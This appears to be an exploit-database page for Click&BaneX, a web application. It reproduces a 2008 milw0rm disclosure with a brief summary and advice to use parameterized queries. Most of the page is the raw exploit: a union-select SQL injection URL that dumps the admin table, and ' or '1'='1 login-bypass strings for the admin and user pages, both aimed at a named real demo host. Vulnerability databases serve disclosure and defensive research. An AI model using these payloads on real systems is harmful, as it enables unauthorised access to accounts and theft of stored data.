header-logo
Suggest Exploit
vendor:
Click&BaneX
by:
AlpHaNiX
7.5
CVSS
HIGH
SQL Injection & Authentication Bypass
89, 287
CWE
Product Name: Click&BaneX
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Click&BaneX

The Click&BaneX application is vulnerable to SQL Injection and Authentication Bypass. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow an attacker to gain access to the application and execute malicious SQL queries.

Mitigation:

The application should be configured to use parameterized queries and input validation should be implemented to prevent malicious input from being passed to the application.
Source

Exploit-DB raw data:

###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################

#Found By : AlpHaNiX
#website  : www.offensivetrack.org
#contact  : AlpHa[AT]HACKER[DOT]BZ

###########################################################################

#script   : Click&BaneX
#download : null
#Demo     :  http://icash.ch/ClickAndBanexDemo/user/  %00 http://icash.ch/ClickAndBanexDemo/admin/

###########################################################################

#Exploits :

--=[SQL INJECTION]=--
http://icash.ch/ClickAndBanexDemo/user/user_menu.asp?user=wd2505&ID=0+union+select+1,2,3,4,5,6,7,9,10,11,12,13,15,16,17+from+admin%00


##########################################################################

--=[AUTH BYPASS]=--

-----ADMIN PAGE----
http://icash.ch/ClickAndBanexDemo/admin/admin_menu.asp

USERNAME  : ' or '1'='1
PASSWORD : ' or '1'='1


-----USER PAGE----
http://icash.ch/ClickAndBanexDemo/user/user_menu.asp
USERNAME  : ' or '1'='1
PASSWORD : ' or '1'='1


#Greetz For My Best Friend ZIGMA

###########################################################################

# milw0rm.com [2008-12-15]

Navigation

Suggest Exploit

Services By CQR